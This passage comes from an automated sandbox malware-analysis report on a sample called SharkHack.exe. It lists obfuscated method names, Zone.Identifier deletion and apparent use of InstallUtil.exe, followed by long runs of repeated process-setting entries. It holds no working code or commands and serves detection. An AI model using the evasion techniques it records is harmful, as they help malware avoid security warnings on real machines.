                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, EvLC0Q6fDXC9d2NcO4o.csHigh entropy of concatenated method names: 'y3SIkriOfA2KxP9yaHuN', 'arfgFciOofuVSo0DV4eY', 'NWYiZbiOROCW9bNxAZHX', 'aWiKCUIsS0', 'EwieORiO3xCusB1DVtIB', 'ygdo6uiOuCx9hULq7qh7', 'ISh7HJiOy2HIhZtwrBAj', 'TquYKdiOPcX1Aj7gXqsg', 'DZfUSaiO4DBX8r6Zeb8V', 'xKqsiD8u3C'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, Esh3jMt4FQd8EuEcSY6.csHigh entropy of concatenated method names: 'VGvtTFGjTO', 'cEKtbTyM3q', 'Xy9q4AiyHD7CLMRiAv2U', 'MF2cTwiyqJeP2krRrIlA', 'ookZbNiyn9RLtg47eWhc', 'CRTt0cUVay', 'JNexX6iyQo3L3NJyNow4', 'B9u0jOiySwt1C8cntHrX', 'L6e4J4iyOFVU8uXvPTil', 'qT5TUfiyl5h8KMiTPq8i'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, EBncGytpUf7ZoU29JqB.csHigh entropy of concatenated method names: 'wvNte76lp3', 'niMtVlqSSy', 'NmhRGfiyVrpkZyBArs5i', 'Up84u1iyGUMhqBXsusD3', 'NFLXdDiye01l8WgZYKpK', 'JJcgwCiyfCG0LZApkqVA', 'l5cBObiyoD2sb2TU2Av5', 'HDyOKUiyRkDhhc33Rbc5', 'FNDM1OiyNGjqiP33ORvJ'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, UeWumTDlK933ofbG6jP.csHigh entropy of concatenated method names: 'gB9DLX5NQc', 'vLSD0KLgdO', 'htrD5rWuSP', 'sbplPXiSWXJu29LxVB5h', 'gTASKLiSiOSYqebOcccs', 'mLhsouiStfFFuKi4HrKM', 'oDjxBbiSFptQTSjZTGAj', 'OSuDSaGGl5', 'UeRDTmJQBI', 'IIgDb6JMCF'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, eVUBXyvd37EwvnNnQ3w.csHigh entropy of concatenated method names: 'CavvFG0FDl', 'pNkvAcYLae', 'a9pCrfixZT49uu9BFDBu', 'wdnQfBixbS19PQGc7ESs', 'I1jTKdixjHWGedalSfg1', 'cE88iqixLy9BPo0HNdJZ', 'eaMpc0ix0w8XESSGnrXk', 'P79vtVxsVD', 'trYP4uixl0SxlvZf0vYS', 'nIJxV3ixQYytgjNfWNg3'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, XIXVg9Q4KO9xqy9Xlbs.csHigh entropy of concatenated method names: 'tulQH6wJbp', 'N7rQqNpbhP', 'BfoQnQBTiZ', 'MI2QMYQ6lW', 'RtyQOOX1Vw', 'J2OQlQ4D6A', 'VcaQQKlZUR', 'GMlQS7HGxf', 'oBPQTQ2B4C', 'EfJQbgXCdI'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, frDJOLlZoeZGEdrZ1X3.csHigh entropy of concatenated method names: 'XliigodMXAr', 'g2Zl0gXKQq', 'xUEl5YkAOK', 'vEll1leoOa', 'XaAKgdiIknsVbxCZthlQ', 'vFqF6SiID0CUrqC73OZj', 'irenp7iIpXSUSUpBaqG0', 'wev5NliIGT2VkybVCcSE', 'oivCBLiIexobAjtRJxlb', 'cQX62AiIVDVxa9ObPfr7'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, KJh8exWND6ZcWOnXuQd.csHigh entropy of concatenated method names: 'RmUWbhpRRv', 'G1hWjdJwxO', 'c6RWZuUcWV', 'nSGE8ri3OFPsQ7NiPeL2', 'PFXMt5i3lWSCXkoPdUTx', 'I1tuExi3nspSDs7SJ772', 'LDt2BHi3MQ6Z8stu2KOR', 'kGcWy8WMmj', 'OgQW3msGEa', 'EHbWPdhG4d'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, Pca9G84gUl1B5pJt88W.csHigh entropy of concatenated method names: 'fP642BYqwe', 'oDt4U3esgt', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'uGk4JxEYO8', 'method_2', 'uc7'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, YtOS3uAjHPjvm6LamqB.csHigh entropy of concatenated method names: 'D4OA19MnMb', 'Tgt40Hi4xk75sebcqV1K', 'l97pIpi4XyljXqYs0RTJ', 'quer0ei4v9fexOkMej5u', 'Y0m9Vni4mEFrf4u7OmrA', 'awViRQi4C2niTnAgF7PD', 'U1J', 'P9X', 'gB2iFrdx1H4', 'r8niFYKCt9g'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, dtCayJyaOGx5LEOmbnx.csHigh entropy of concatenated method names: 'hRpy87pyrI', 'rgLyXJNn9s', 'xrvyvZlRVY', 'kBbyx5RX3D', 'z9aymVHYtV', 'h430cVi0MT6GB8bp0Oax', 'e0M4URi0qse9OOyw5K9m', 'Y6054Ai0nZApwL0AwoES', 'DcE4iKi0O2QqbuAEyXFN', 'HY1BgKi0lF3JlOEUFCko'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, j2x2Sff2hRDpqR2f5OY.csHigh entropy of concatenated method names: 'bZef4EuTZo', 'RWyfJpZ60i', 'JjSf739fAQ', 'EXUfK9xQdm', 'YsdfsrIDJe', 'V3sfrKcJS1', 'x0QfYm0CRu', 'zlqfhQYeeN', 'xi9fkH9VTu', 'YvifD2lyvG'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, nbUq6oQvQdMCN2Hs7at.csHigh entropy of concatenated method names: 'Gc7QmrQD96', 'NDxQCEet1Q', 'lusQzVbVTA', 'NDKSdJaVcp', 'MrwSi66YFg', 'dytStV5WeX', 'DlcSWH8pOM', 'YpISFqi8LN', 'HF6SAahAIr', 'LFVS9hTlvS'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, xH9QInGrC59cxP8qDW4.csHigh entropy of concatenated method names: 'ctAO1iibcuOOhCAKxCPQ', 'Dw8LkQibg00Z3KRF7owu', 'U11kqkibAmMmrhJZIvmM', 'nfY5ibib9KkgKwFVplie', 'method_0', 'method_1', 'rE0Ghwiuev', 'WRqGk09NyA', 'B8yGDr3jgp', 'W6IGpW2WgQ'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, kmhB7lqwmHUwLGJmKu0.csHigh entropy of concatenated method names: 'CZDxByiE8077frUYJsAW', 'tBtXZPiEaWEUuowfrQZ7', 'jxGgg9iEI46V6499lLqe', 'SreqagUmRA', 'Mh9', 'method_0', 'r6qqIKuoZ3', 'FgVq8ZdeRF', 'oHCqXA0hs7', 'N2eqv9P9EL'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, hZYSeB4xUMHfeUYaw62.csHigh entropy of concatenated method names: 'U6u4CvfqOS', 'Inx4zFDjCM', 'zGDBdWb0RJ', 'bixBiavytf', 'kHQBtll121', 'bXDBWs5g1w', 'Rpx', 'method_4', 'f6W', 'uL1'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, O95YsE9qy1W69aUchol.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'Alwig2UkaYK', 'emDiFi8Sspd', 'UN9Q5IiBBJW23Kx38LRA', 'SCYp8tiBHgv2IeodXskq', 'iWbJGGiBq1UWJUeMpV5x'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, oMw4Viojjr8FPG6vReH.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 't3LoLsW6Xs', 'Irqo0KQ6xZ', 'Dispose', 'D31', 'wNK'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, HrqOLvcDQCbwN14G5yu.csHigh entropy of concatenated method names: 'Ericyj5b5T', 'PN7E2BiHyvq620MKAr0X', 'Bq5ZkPiH3QxMoE2s46eZ', 'VPGGxaiHN21wEqe10crR', 'IHm6uoiHufYvs8LaRGTu', 'kGBgpOiHPTLM3WXm9LCb', 'fdAcGvYvKy', 'zZwcexr3rj', 'Q1LcV0AnGu', 'JTAcftioV6'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, Xx42aTN4NyQdEJlZivE.csHigh entropy of concatenated method names: 'method_0', 'AEUNHx7mlM', 'NWqNqL01L2', 'uQ0NnuYY7u', 'dyVNMe95EV', 'I0dNOKm6gM', 'm2eNlB2Ekd', 'eWrFGfiL9HdiVh6EmYUH', 'o4bu93iLcCdgP9loVENc', 'jFHwN6iLgUQvBeJYRisc'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, pUIXWIqOCHR9wOxYaox.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'LdyqQHoAU1', 'WmqqSZctKi', 'bxSqTeNP9V', 'Ajdqb9Rnyk', 'bYyqjOhkCi', 'IyLqZS3glN', 'yBmCQ4iEqUsv8exxUdaO'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, pS5VWSiIe7h1sjvCDva.csHigh entropy of concatenated method names: 'P9X', 'z03iXI6LFe', 'ABNigd3qUPs', 'imethod_0', 'oVtivQfkKW', 'Oiph8diuwSj5qvdu1xK2', 'qhdcBaiuEEK1lEPOKOmC', 'KhF8UAiu55LjgvwngnW4', 'tYYfRyiu1CMZ4oQCYtwF', 'SqrceLiua0PGbxReinwt'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, qW8DReFRKfdEuJS2l55.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'ahkigWCtEhv', 'emDiFi8Sspd', 'pG1yGsiPDieYox0Eb89n', 'CyNlIuiPp9soMlbFryOv', 'Rk43HdiPGlqwUOA1V1yT'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, fZTkO09orwlYpJw0agv.csHigh entropy of concatenated method names: 'V4n94dxbnf', 'MJ1f15iByj46X11DKBYu', 'AnWq36iB33rm6YZMt0AJ', 'yN6UMpiBPCiAwpI9h0v4', 'E94', 'P9X', 'vmethod_0', 'nvGiFpRUWeJ', 'XBNig6v3YIG', 'imethod_0'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, xWrfjGe7y11IxF2Ve4q.csHigh entropy of concatenated method names: 'sVwfiZlqpO', 'joUd0WijsqNpjLtbZZuZ', 'IyVuL6ij7vpncKOPnJ1B', 'kaPhYeijKfOgRfKo8D6k', 'a3vesu7qaJ', 'uiuerihOxX', 'mISeYJ5Euj', 'OLJehU9yKl', 'aQgekVW6Ao', 'y0geDl3EkV'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, C0CLCEBGmfMtk1KjCNJ.csHigh entropy of concatenated method names: 'b2KHKLol5Z', 'DV89Zliwn6dSou575Og9', 'PQVUQbiwH3jHZ9JX5Qwa', 'w9BDwCiwqfxPFBItGCtj', 'TG6IA5iwMUymyG5Y1oZ7', 'kt5', 'qK6BViJVbu', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, ali708plKM6Ni0289eD.csHigh entropy of concatenated method names: 'N2N', 'HYTigsLWGKH', 'qKMpS0HIxi', 'RREigrLD9HM', 'nXKamkiTFKWS8B4BOMLX', 'hXP0LyiTAR68QUZq5h73', 'kBMBAHiTtqvUDdIl88SQ', 'LvusYXiTWSrAbUv9BOlE', 'zY6ZoeiT9v0mrVZwpFY2', 'xyRdffiTcGhcM471lY4V'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, vbJysBiKR1qvJiGrKqe.csHigh entropy of concatenated method names: 'pRBir33wN1', 'RoyiYrH1K6', 'R2Wiht9r4f', 'kl944xiuYB7TT1l5Inm8', 'PqXV1cius1YWmrOA7p7b', 'mqvUu0iurlLbT1HcsgM5', 'kyv6j7iuhuSX5vtcZ82L', 'KPF2ctiukq6aupc4PZPU', 'CdfZAPiuD4ZPEOjHMXqN'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, aiivD1jFb3ZoBVhwvH.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'NUbL9SjsI'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, avWVKRHwOK5QhelB7wy.csHigh entropy of concatenated method names: 'DQyHasOjw5', 'k6r', 'ueK', 'QH3', 'blfHIDWCe2', 'Flush', 'mxCH8Vielg', 'lOYHXXeK0U', 'Write', 'oTpHvKIfXZ'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, bjUD4qciiGm35ihtVho.csHigh entropy of concatenated method names: 'lqlcWgBqO2', 'FOAcFJ3uEm', 'A1bcAK34IE', 'pyUyeMiBX2jZNNoWl7eh', 'lNct3CiBvT30lAx0cwCN', 'NHTALFiBxln8KeaJZ4y4', 'KcUy90iBmHsdoDGLHTGM', 'h6EDLLiBCQ6UpG9pQLt8', 'COuvGniBzuCYUS2gaTE3', 'WiGUN0iHdpt8PpelCcST'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, KBLMFH6KkAlYsgGtW00.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'LWMejdinRTJ496yh7B5U', 'vcQ8i2inN0XuciRBB1II', 'Y4KF5qinuvF4uav4o1jb', 'h1F6r791Tl'
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\SharkHack.exe - File opened: C:\Users\user\Desktop\SharkHack.exe\:Zone.Identifier read attributes | delete
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe\:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\SharkHack.exe - Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
